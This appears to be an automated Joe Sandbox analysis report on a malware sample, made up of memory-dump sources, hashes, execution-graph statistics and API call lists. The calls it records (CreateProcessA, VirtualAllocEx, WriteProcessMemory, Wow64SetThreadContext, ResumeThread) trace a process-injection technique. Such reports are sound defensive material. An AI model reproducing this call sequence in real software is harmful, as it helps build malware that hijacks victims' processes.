                                        • Instruction ID: da00cd2ca2b066270045f4206ae4380a3aa7525633bb0d1c88c521a2ffde4507
                                        • Opcode Fuzzy Hash: 381ed6525e104fd653fbcff4c97995c10adeacf00af96815eb9800bc8847ad04
                                        • Instruction Fuzzy Hash: 5C1164B29002488FCB10DFAAC844BDEFFF5EF88324F208419E519A7250C735A940CFA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 0e4c53ba3863bf97bede323e2e3d6e853ac253cb7141d5193d9d6fa66116c025
                                        • Instruction ID: 22c971474384f74ee9e409fd5e15139f6de3db9c1a08ccde875fffb51ace5a24
                                        • Opcode Fuzzy Hash: 0e4c53ba3863bf97bede323e2e3d6e853ac253cb7141d5193d9d6fa66116c025
                                        • Instruction Fuzzy Hash: 481128B19002488FDB20DFAAC8457DFFBF9EB88324F24841DD459A7250CB79A944CBA5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06AC504D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 511aadd64900e059562d242722bd1d1b3a5ed6bbed11cd5c33c77b8ae878354e
                                        • Instruction ID: 5f33f3341c2fda19cb85ab0cef614635ad43d3eb22100e6643883c6c24ec72d7
                                        • Opcode Fuzzy Hash: 511aadd64900e059562d242722bd1d1b3a5ed6bbed11cd5c33c77b8ae878354e
                                        • Instruction Fuzzy Hash: 0711F5B98002489FDB20DF9AD845BDEFBF8EB48324F108419E558A7611C375A584CFA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 208c1abd686f87cc633dd287155138a6b9dab87511b03347da3f2df102033c8a
                                        • Instruction ID: 5bb484253323002be0df29345efcc51bb0305d10375d5a35de6c085d3247ed8f
                                        • Opcode Fuzzy Hash: 208c1abd686f87cc633dd287155138a6b9dab87511b03347da3f2df102033c8a
                                        • Instruction Fuzzy Hash: 2D1136B1D002488FDB20DFAAC4457EEFBF4EB88324F20842DD459A7250CB75A944CFA4
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06AC504D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: ce12e75a07fdba06fa770b545dfeb5baee8961ce7a9207e87072a94e8d5c384b
                                        • Instruction ID: 264d2ec532e43cb0afc75bc1583da9967224269e1506fef6362e98506fdccdf6
                                        • Opcode Fuzzy Hash: ce12e75a07fdba06fa770b545dfeb5baee8961ce7a9207e87072a94e8d5c384b
                                        • Instruction Fuzzy Hash: 7D11F5B58003499FDB10DF9AD889BDEBBF8EB48324F108419E555A7250C375A944CFE5
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2B3BE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 644c1036fd2de326dc9b031d61480b9c9773da36669ce9e6e3df6da12a5874d1
                                        • Instruction ID: 0de08a860dc229b7f44b58fb76e71e9a90d5beb0fcd3bb2da66bee8ab85ad560
                                        • Opcode Fuzzy Hash: 644c1036fd2de326dc9b031d61480b9c9773da36669ce9e6e3df6da12a5874d1
                                        • Instruction Fuzzy Hash: 3111E0B5C002598FCB10DF9AD444ADEFBF4AF88324F14846AD459A7610C3B5A545CFA5
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839775530.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_92d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d035acc6dd1e44ca8db808c0d7715a04445e56668ff6e77ee87b93a8a6e1f9f6
                                        • Instruction ID: 90365531e2f31c869ba5f1f4236b0ed2c020c5c74db1161701701f49e4562448
                                        • Opcode Fuzzy Hash: d035acc6dd1e44ca8db808c0d7715a04445e56668ff6e77ee87b93a8a6e1f9f6
                                        • Instruction Fuzzy Hash: 9B210371504240DFDB05DF14E9C4B2ABF69FB88314F20C569ED194B25AC33AD816CBA1
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839862207.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_93d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69d5a7294cf00ce3248ad916411ce25743b9baab3957838f0442c0bb0d3b4548
                                        • Instruction ID: f2f8f8aa0c3dab5dd7159a058ef86b1fac5c9bccc4129195345cf59cf7077ec5
                                        • Opcode Fuzzy Hash: 69d5a7294cf00ce3248ad916411ce25743b9baab3957838f0442c0bb0d3b4548
                                        • Instruction Fuzzy Hash: B1210775504200DFDB18DF14E5D4B26BFA5FB84714F20C96DD8494B256C33AD847CE61
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839862207.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_93d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4da8e6faaf913d6cf277a410e8c71385abbc514630f9bc3597f65cc33c4945cf
                                        • Instruction ID: ae9632d955f4a0db7e1a830027a01e1835b3838b9a15dcae1d4849ee289ff2cd
                                        • Opcode Fuzzy Hash: 4da8e6faaf913d6cf277a410e8c71385abbc514630f9bc3597f65cc33c4945cf
                                        • Instruction Fuzzy Hash: CC218E755093808FCB06CF24D9A4715BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839775530.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_92d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                        • Instruction ID: 5f568a84108fc4ed895fb234962345ed9a43d078fafc4dbc2df52b7fa1b1c46b
                                        • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                        • Instruction Fuzzy Hash: 8221B176504240DFDB06CF50D9C4B56BF72FB94314F24C5A9DD090B65AC33AD82ACBA1

                                        Execution Graph

                                        Execution Coverage:12%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:20
                                        Total number of Limit Nodes:4
                                        execution_graph 25859 18c0848 25861 18c084e 25859->25861 25860 18c091b 25861->25860 25863 18c1340 25861->25863 25865 18c1343 25863->25865 25864 18c1454 25864->25861 25865->25864 25867 18c8219 25865->25867 25868 18c8223 25867->25868 25869 18c82d9 25868->25869 25872 708fa70 25868->25872 25876 708fa80 25868->25876 25869->25865 25873 708fa95 25872->25873 25874 708fca6 25873->25874 25875 708fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25873->25875 25874->25869 25875->25873 25877 708fa95 25876->25877 25878 708fca6 25877->25878 25879 708fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25877->25879 25878->25869 25879->25877 25880 18c8040 25881 18c8086 DeleteFileW 25880->25881 25883 18c80bf 25881->25883

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 9fde80074ef808c3b44b1d6f698a51d5348587594223521daed4992ed92b4b06
                                        • Instruction ID: 6cc73d537c9756a8fba56e378c56c7b3aa1fefa440230f561494f05d5d193aa9
                                        • Opcode Fuzzy Hash: 9fde80074ef808c3b44b1d6f698a51d5348587594223521daed4992ed92b4b06
                                        • Instruction Fuzzy Hash: CC322E71E1071A8FCB54EF69C89459DF7B5FFC9700F1086AAD449AB224EB309D85CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 72633ce853905cc8b49b2554d9fe71c947a0207b2da436b24591c8045c03ef7d
                                        • Instruction ID: f329adae5e9cd26f1e1574ddc718859cb80bd0a42dbd689e477a99181315bff1
                                        • Opcode Fuzzy Hash: 72633ce853905cc8b49b2554d9fe71c947a0207b2da436b24591c8045c03ef7d
                                        • Instruction Fuzzy Hash: B902AE70B102068FCB94EB68D590A6EB7E6FF84304F64C629D449DB395DB35EC86CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: a494568a08f40fa12a87bb72539fb856bcfa4850b3a40ccca425e5f48e145f88
                                        • Instruction ID: f565d1df552d368c962d89e715893523aab9dfc72578d32f6ec57cce20c7a39c
                                        • Opcode Fuzzy Hash: a494568a08f40fa12a87bb72539fb856bcfa4850b3a40ccca425e5f48e145f88
                                        • Instruction Fuzzy Hash: 7D22C4B1E002168FDBA0EB64C8846AEB7F2FF85324F108569D899AB344DB31DD55CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 989bc8fc558b01a65bbce7c9531d84ebda67723bd1c43eb031f2cef866061645
                                        • Instruction ID: 04c680bbc14f265cc28445ed6c5479e782b5bc54f93b23481d369e88e112be2b
                                        • Opcode Fuzzy Hash: 989bc8fc558b01a65bbce7c9531d84ebda67723bd1c43eb031f2cef866061645
                                        • Instruction Fuzzy Hash: C7A23674A002098FDBA4EB68C584B5DBBF2FF89314F1486A9D4899B361DB35EC85CF41
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b646ea6ad233c66f212f3b7536d76242e4eda1acdc0eba53f33b57ca4a2145c
                                        • Instruction ID: e68eb44be9e6c4af36e398928ce0da04e1b4f785621717bb54fcf33d6c287de6
                                        • Opcode Fuzzy Hash: 9b646ea6ad233c66f212f3b7536d76242e4eda1acdc0eba53f33b57ca4a2145c
                                        • Instruction Fuzzy Hash: D462B070A002058FCB94EBA8D594BADB7F2FF84314F258569D44ADB391DB36EC46CB81
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 798364ba4b3bd4e7f65d9017fcf82f8bfe032bc788b1f332b4bdae3219a00a2c
                                        • Instruction ID: c92650620f44c56d13b3462b08fe18b23f5adbbf3b201db0a01e840d7d463d92
                                        • Opcode Fuzzy Hash: 798364ba4b3bd4e7f65d9017fcf82f8bfe032bc788b1f332b4bdae3219a00a2c
                                        • Instruction Fuzzy Hash: D32251F0A0020A9FDFA4EB6CD4807ADB7F5EB45310F248626E495EB395DA34DC85CB51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: d730d59e5e98f4a450943b171cdcacfcf2929929ed9931822b799c9ddfc069ad
                                        • Instruction ID: 0ec5ddadeafb05253e307bbd9a6818d85a78e3347d1e0ee6a39392b85f575e48
                                        • Opcode Fuzzy Hash: d730d59e5e98f4a450943b171cdcacfcf2929929ed9931822b799c9ddfc069ad
                                        • Instruction Fuzzy Hash: 74E14EB0B0020A8FCB65EFA8D4806AEB7F2FF85314F10862AD455DB355DB35DC4A8B91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: b2a1898c8f233d1eb48e714992ad33a02a7d4ccb44fa85f1dcc7ce75951e39df
                                        • Instruction ID: d39073f66040310b55ca9f49f5591d1be98472577d8cabbe7e5a5bb7387f522c
                                        • Opcode Fuzzy Hash: b2a1898c8f233d1eb48e714992ad33a02a7d4ccb44fa85f1dcc7ce75951e39df
                                        • Instruction Fuzzy Hash: F6026BB0A0020A8FDBA4EF68D4806ADB7F2FF45310F24866AD495DB355DB75DC85CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: c1c26dc4886cfca812af4fb0a931f5603dea169509b7cf1eb096c7887f85b7ec
                                        • Instruction ID: cc13f2b5b335fc736ada1421ed256295d66cd5562ba450ac6fedb719b92c785d
                                        • Opcode Fuzzy Hash: c1c26dc4886cfca812af4fb0a931f5603dea169509b7cf1eb096c7887f85b7ec
                                        • Instruction Fuzzy Hash: 07916E70B1020A9FDB94EB69D9507AEB3F6FBC9204F108569C40DEB354EE70EC468B91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338

                                        Control-flow Graph (image not recovered; the graph's nodes include a call to GlobalMemoryStatusEx)
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:

                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 018C80B0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0

                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 018C80B0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0

                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 018CEFDF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: t
                                        • API String ID: 0-2238339752
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;
                                        • API String ID: 0-1661535913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Ocq
                                        • API String ID: 0-2995510325
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af011b720525e6aba5f31c62ee49cdb3a170b7653b0c69895376ea3135de6521
                                        • Instruction ID: 549c6f3464e1af10cd61c5900db713c1effd32aea32917fa7af42d5c964e6bc7
                                        • Opcode Fuzzy Hash: af011b720525e6aba5f31c62ee49cdb3a170b7653b0c69895376ea3135de6521
                                        • Instruction Fuzzy Hash: B34154B1A006068FDF70DF99DC806AFFBF2EB54310F104A2AE156D7654D330E9658B91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c7067c1f26fc83b08a68b9398dab620c0539f8ab552012150b988b864bd3395
                                        • Instruction ID: 2ad2d964c6b42268c68bfdd9433a5bd309a74b501fffea6cbfa12fe6c2bbeeb4
                                        • Opcode Fuzzy Hash: 2c7067c1f26fc83b08a68b9398dab620c0539f8ab552012150b988b864bd3395
                                        • Instruction Fuzzy Hash: 7A318370A1020A9FCF55DF68C48069EF7F6FF89314F244629D445EB340EB71A9468B81
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcef44709049d80b0f3f94b4316e6d9972279a980036982ba84d8bba093cee36
                                        • Instruction ID: 2637b1d88755ba9072d3ed8c7f299a453b90cc9972729e2df62087df6c04ae5a
                                        • Opcode Fuzzy Hash: dcef44709049d80b0f3f94b4316e6d9972279a980036982ba84d8bba093cee36
                                        • Instruction Fuzzy Hash: 96319E71E0060A9BCF94DFA4D89469EB7F6FF89300F208529E946E7350DB70AD42CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce8ccac98d2101ec6fec78eb0d48ae61541d1a38d7a1b4f21efb28652acff0ff
                                        • Instruction ID: 1b8d51dbd22e365d50f327d6d8f3ab0943de7b98de88058ce8a904a6e059bb0d
                                        • Opcode Fuzzy Hash: ce8ccac98d2101ec6fec78eb0d48ae61541d1a38d7a1b4f21efb28652acff0ff
                                        • Instruction Fuzzy Hash: 34317C71E0060A9BCF49DFA4D85469EB7F6FF89310F208529E946EB350DB70AC42CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a76572f275f78d684e2da240e8f061a01020a57beca3ee5986568c90804f9bae
                                        • Instruction ID: e69a38696924feef1c493c82637a1e2d88756016096e628c3cbd2d33dba49934
                                        • Opcode Fuzzy Hash: a76572f275f78d684e2da240e8f061a01020a57beca3ee5986568c90804f9bae
                                        • Instruction Fuzzy Hash: CA318CB1B002169FCB50DF68E840AEEBBF1FB48710F108026E954EB390E735E9018B91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e28fa25cdbd9ee7ff08763a8cd11a1e5ad6f05e498efc545387251723f81782e
                                        • Instruction ID: c290395793b50f09fbf06e4c02995b761c7d0ea191a7b395a33e17aa7ffdaf16
                                        • Opcode Fuzzy Hash: e28fa25cdbd9ee7ff08763a8cd11a1e5ad6f05e498efc545387251723f81782e
                                        • Instruction Fuzzy Hash: F2218BB5F002069FDB50DFA8D980EAEBBF5FB48610F108129E955EB390E735ED018B91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd

                                        Execution Graph

                                        Execution Coverage:11.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:148
                                        Total number of Limit Nodes:14
                                        [Execution graph node listing omitted. API calls reached in the graph: GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, CreateProcessA, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW]

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00B0D87E
                                        • GetCurrentThread.KERNEL32 ref: 00B0D8BB
                                        • GetCurrentProcess.KERNEL32 ref: 00B0D8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 00B0D951
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: b4fe63ead1581510c1d400e54ee6ca2a5cee65bcdf45c322efe3cd8b444f73b5
                                        • Instruction ID: 51ea085e8df5feb9a9fef1b1a9d8f3fd07b67e12c1e8cfaa708d7ae3cbacdc48
                                        • Opcode Fuzzy Hash: b4fe63ead1581510c1d400e54ee6ca2a5cee65bcdf45c322efe3cd8b444f73b5
                                        • Instruction Fuzzy Hash: 375145B09007498FDB14DFAAC548B9EBFF1EF88314F20C469E409A72A0DB349984CF65

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D1826
                                        Memory Dump Source
